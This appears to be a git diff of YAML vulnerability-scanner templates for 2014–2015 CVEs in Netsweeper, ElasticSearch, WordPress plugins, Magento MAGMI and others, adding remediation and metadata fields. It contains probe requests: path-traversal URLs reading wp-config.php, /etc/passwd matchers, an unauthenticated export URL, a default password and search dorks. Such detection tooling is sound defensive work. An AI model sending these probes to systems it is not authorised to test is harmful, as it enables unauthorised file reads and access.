webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + description: | + A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 @@ -14,11 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9608 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve,cve2014,netsweeper,xss,packetstorm + epss-percentile: 0.4136 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,xss,packetstorm http: - method: GET @@ -32,6 +38,13 @@ http: words: - '' + - type: word + part: header + words: + - 'webadminU=' + - 'webadmin=' + condition: or + - type: word part: header words: @@ -41,4 +54,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 490a004630440220108482ed3183644895e2df932dd2d2d56fddaddd16cac55abf36168564c37171022008c761eeaf9c78b8bb679ff3cd924097e40b917f967eb58d94df0b49feaa413f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 92b4d0e953..5f0d2e5ec0 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + remediation: | + Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 @@ -14,11 +16,14 @@ info: cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 + epss-score: 0.00212 + epss-percentile: 0.58861 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.00149 - tags: cve2014,netsweeper,lfi,packetstorm,cve metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,lfi,packetstorm,cve http: - method: GET @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4b0a00483046022100bd6d37ae8a251d5d23d3270163c014f8bf77addbee258cc794e3a47c737344a3022100b5335775a5d8f2f43295535343fbec70e818de044625b69e4c213836d4ac3548:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 987d370f90..acb9076de0 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + remediation: | + Change the default credentials to strong and unique ones. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 @@ -14,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 + epss-score: 0.01433 + epss-percentile: 0.85119 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.01015 - tags: cve,cve2014,netsweeper,default-login,packetstorm metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,default-login,packetstorm http: - raw: @@ -32,10 +37,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 302 - - type: word part: header words: @@ -48,4 +49,8 @@ http: words: - 'Set-Cookie: webadminU=' -# Enhanced by mp on 2022/02/25 + - type: status + status: + - 302 + +# digest: 4a0a00473045022100bcbeb9e81247b97d5420d06fc072661e517933c29a09161fab2d908640779519022045ea181bdb413778636f5d104735524eca9db016a9dfe846c88de4a8de4e4eb1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 1f165adf41..1890d437a8 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9615 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9615 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve,cve2014,netsweeper,xss,packetstorm + epss-percentile: 0.4136 + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,xss,packetstorm http: - method: GET @@ -41,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 +# digest: 4a0a00473045022100d69d2317398a8f744032f9535c9a07e5913a13d5d98b1601e124950212fae8ea02201d46c2387c75acffe6a98bf28da132297144ba6a395099f23efab2cc5811731a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 7381e4248a..2f0a9e4713 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9617 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9617 cwe-id: CWE-601 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00109 - tags: cve,cve2014,netsweeper,redirect,packetstorm + epss-percentile: 0.43753 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,redirect,packetstorm http: - method: GET @@ -31,4 +36,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# Enhanced by mp on 2022/02/25 +# digest: 490a00463044022048603cf82ca090463278465b004ecf7e9e6864a680eaf80b16f50ca238910d80022016d4ac5ce7491cbf5d6c6a9faf4eabc88012244cafd39625d2ab7d31aef798c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index cc64203554..1fa3482d04 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 @@ -16,9 +18,14 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 - tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve + epss-score: 0.03433 + epss-percentile: 0.90406 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve http: - method: GET @@ -39,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/10 +# digest: 490a0046304402201e77822f213457c104ae84cd876e6d08f4b7685191185b6fe64c33fafd6dce8402201ba1f4ce423fa4b9849ca21544075f8234368a2b1d8c8836edbaf87de046d7e0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 3c0733df87..c3e7ad1078 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -3,21 +3,28 @@ id: CVE-2015-0554 info: name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure author: daffainfo - severity: high + severity: critical description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/35721 - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - http://www.exploit-db.com/exploits/35721 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-200 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C + cvss-score: 9.4 cve-id: CVE-2015-0554 - tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 + cwe-id: CWE-264 + epss-score: 0.0196 + epss-percentile: 0.8743 + cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adb + product: p.dga4001n_firmware + tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 http: - method: GET @@ -38,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4a0a00473045022020e696e0c27a2df973906272904f967e82777addce44792f81867c6b9c697177022100d7b6eba2bfb402f85fc8cc74044ca71f639700929ae3cbde73d3330091a55510:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 735e09b85c..b4ba87be10 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + remediation: | + Update to the latest version of the plugin. reference: - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005 @@ -15,9 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + epss-score: 0.05243 + epss-percentile: 0.92145 + cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: candidate-application-form_project + product: candidate-application-form + framework: wordpress + tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: - method: GET @@ -34,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/21 +# digest: 490a0046304402203eefece7070f9c83dccb0680869940bdf7d47245f351ee172a011389cd01813602203afef6f81067f8a6d8a83d2b21e17befbd19a167b96e0aec8f05be53fcc2fa05:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 046be7d360..1bf0595ebf 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + remediation: | + Update to the latest version of the WordPress Simple Image Manipulator plugin. reference: - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543 @@ -15,10 +17,16 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000010 - cwe-id: CWE-22 - tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + cwe-id: CWE-284 + epss-score: 0.03171 + epss-percentile: 0.90044 + cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: simple-image-manipulator_project + product: simple-image-manipulator + framework: wordpress + tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: - method: GET @@ -35,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 +# digest: 490a0046304402207afeb57905e436baad3eaec1db23383def03fad4a783ed4a31b10724f4a3563302203df28a9c027d300b3fab24e27a4aed5c2ec58f0a5a67b4140955595bd3605ed5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 80cabf7b4a..9df6bdc736 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: high description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. + remediation: | + Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - http://www.vapidlabs.com/advisory.php?v=154 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 - - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000012 cwe-id: CWE-200 + epss-score: 0.00773 + epss-percentile: 0.79313 + cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: mypixs_project + product: mypixs + framework: wordpress google-query: inurl:"/wp-content/plugins/mypixs" tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve @@ -29,11 +36,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 -# Enhanced by mp on 2022/06/06 +# digest: 4a0a00473045022005bd8738db3b1e1523d83f05cf5654ef4ef2d460148f3f3292488c2c627be1e2022100f57d3760d3fb04b2da6fc66fa5fef1ffebbd3fa8afa62fb2145720f36e8fa1cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 05206ca66a..03f9daecc8 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -3,21 +3,29 @@ id: CVE-2015-1427 info: name: ElasticSearch - Remote Code Execution author: pikpikcu - severity: critical + severity: high description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. + remediation: | + Apply the latest security patches and updates provided by ElasticSearch to fix the deserialization vulnerability. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 - - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585 + - http://packetstormsecurity.com/files/130368/Elasticsearch-1.3.7-1.4.2-Sandbox-Escape-Command-Execution.html + - https://access.redhat.com/errata/RHSA-2017:0868 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2015-1427 - tags: cve,cve2015,elastic,rce,elasticsearch,kev + cwe-id: CWE-284 + epss-score: 0.8674 + epss-percentile: 0.98242 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: elasticsearch + product: elasticsearch + tags: packetstorm,cve,cve2015,elastic,rce,elasticsearch,kev http: - raw: @@ -31,7 +39,6 @@ http: { "name": "test" } - - | POST /_search HTTP/1.1 Host: {{Hostname}} @@ -43,17 +50,17 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/05/11 +# digest: 4b0a00483046022100cbb478349335b35a311a5b9eb248a5d1f5d6996c8715194d965867b857c246df0221009e8c434a37150e80889e5ad4eeefc9fa38fab72a9f3e608fd0b6b406e4028a0a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 7a30e38ea8..cbb0a71f43 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. + remediation: | + Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - http://www.icewarp.com @@ -14,9 +16,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1503 - cwe-id: CWE-200 + cwe-id: CWE-22 + epss-score: 0.93087 + epss-percentile: 0.98768 + cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: icewarp + product: mail_server shodan-query: title:"icewarp" tags: lfi,mail,packetstorm,cve,cve2015,icewarp @@ -28,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -37,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/06 +# digest: 4a0a0047304502205b5c931d05afeecd2127e0f3c5e1ef0a3a0c01e8f6ca2b45c771848ecbbb367c022100bb50219ed226871a6d72a606dafc173d5e36c86ba06b5708108b79d9c95433db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 3bf2808a72..47de0c2da7 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -3,21 +3,30 @@ id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x - severity: high + severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. + remediation: | + Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 + - https://wpvulndb.com/vulnerabilities/7540 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 + epss-score: 0.92959 + epss-percentile: 0.9875 + cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: elegant_themes + product: divi + framework: wordpress google-query: inurl:/wp-content/plugins/revslider tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 @@ -28,6 +37,7 @@ http: - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -42,4 +52,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 +# digest: 4a0a00473045022100b84f0a1dbb8cb8e1958dfde2854377094312810e25989dca71d2118a8d79644702205dc8a70d475d5a0d744fda8fb4e5c63d76b47e703a02746bf9cf0caf750833e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index fe1b6beb96..f8f06972d7 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -5,19 +5,27 @@ info: author: pikpikcu severity: medium description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + remediation: | + Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability. reference: - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - http://web.archive.org/web/20210122155324/https://www.securityfocus.com/bid/74652/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 + - http://www.securitytracker.com/id/1032261 + - http://www.securitytracker.com/id/1032262 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-1880 cwe-id: CWE-79 - tags: cve,cve2015,xss,fortigates + epss-score: 0.00201 + epss-percentile: 0.57815 + cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fortinet + product: fortios + tags: cve,cve2015,xss,fortigates,intrusive http: - method: GET @@ -26,19 +34,18 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - - type: word + part: header words: - - "" - part: body + - text/html - type: status status: - 200 - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402200943f7d11737f10b142f403441b9af30ad37badf5f4f4eba854aa7add027605502205038c0584e32db6b1dff4be91fbe16afb6a9dd1c0875d3d8f4658afdbf016f94:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml new file mode 100644 index 0000000000..ecb635698b --- /dev/null +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -0,0 +1,41 @@ +id: CVE-2015-20067 + +info: + name: WP Attachment Export < 0.2.4 - Unrestricted File Download + author: r3Y3r53 + severity: high + description: | + The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress + powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text. + remediation: Fixed in 0.2.4 + reference: + - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a + - https://packetstormsecurity.com/files/132693/ + - https://seclists.org/fulldisclosure/2015/Jul/73 + - https://nvd.nist.gov/vuln/detail/CVE-2015-20067 + classification: + cve-id: CVE-2015-20067 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: 862 + metadata: + max-request: 2 + verified: true + google-query: inurl:"/wp-content/plugins/wp-attachment-export/" + tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true" + - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/xml")' + - 'contains_all(body, "title","wp:author_id","wp:author_email")' + condition: and +# digest: 4b0a00483046022100c3094b36bbe20fa181efa0ebb7100749ad77eb38a7c0c266f48d485931e8dbdc022100cdc3319af15d2f35ebdfcbe5c99e0304b65e039dd2108b84e5d010ef48ad9285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 6c25aff9eb..6ae85c463e 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -3,8 +3,10 @@ id: CVE-2015-2067 info: name: Magento Server MAGMI - Directory Traversal author: daffainfo - severity: high + severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Apply the latest security patches and updates provided by Magento. reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 @@ -14,8 +16,14 @@ info: cvss-score: 5 cve-id: CVE-2015-2067 cwe-id: CWE-22 + epss-score: 0.01338 + epss-percentile: 0.84602 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 + vendor: magmi_project + product: magmi + framework: magento_server shodan-query: http.component:"Magento" tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4b0a004830460221009b45ea7e8dce8772c766c8493d28b4fa383dde0236430657524d1c4fe167fa22022100c477b8547acb1e5f5d4a45f68515cedaf66c2ea80daf5d83e08fbb0db4f99bb4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index fbfb85b04a..776bfeb200 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. + remediation: | + Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module. reference: - https://www.exploit-db.com/exploits/35996 - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html @@ -14,10 +16,16 @@ info: cvss-score: 4.3 cve-id: CVE-2015-2068 cwe-id: CWE-79 + epss-score: 0.00146 + epss-percentile: 0.50271 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: - max-request: 1 - shodan-query: http.component:"Magento" verified: true + max-request: 1 + vendor: magmi_project + product: magmi + framework: magento_server + shodan-query: http.component:"Magento" tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss http: @@ -41,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a0047304502204ec1b153b3325821af9357407d2f9177c42132eb23a446b3866c021a27c1874a022100ed47d53be11b48c921e8d315310b43160d53b49ce272afe9ec511c40d329d1b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index adcfc5fbbd..7a8f6d9d89 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -5,35 +5,45 @@ info: author: pikpikcu severity: high description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header. + remediation: | + Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability. reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - https://nvd.nist.gov/vuln/detail/CVE-2015-2080 + - 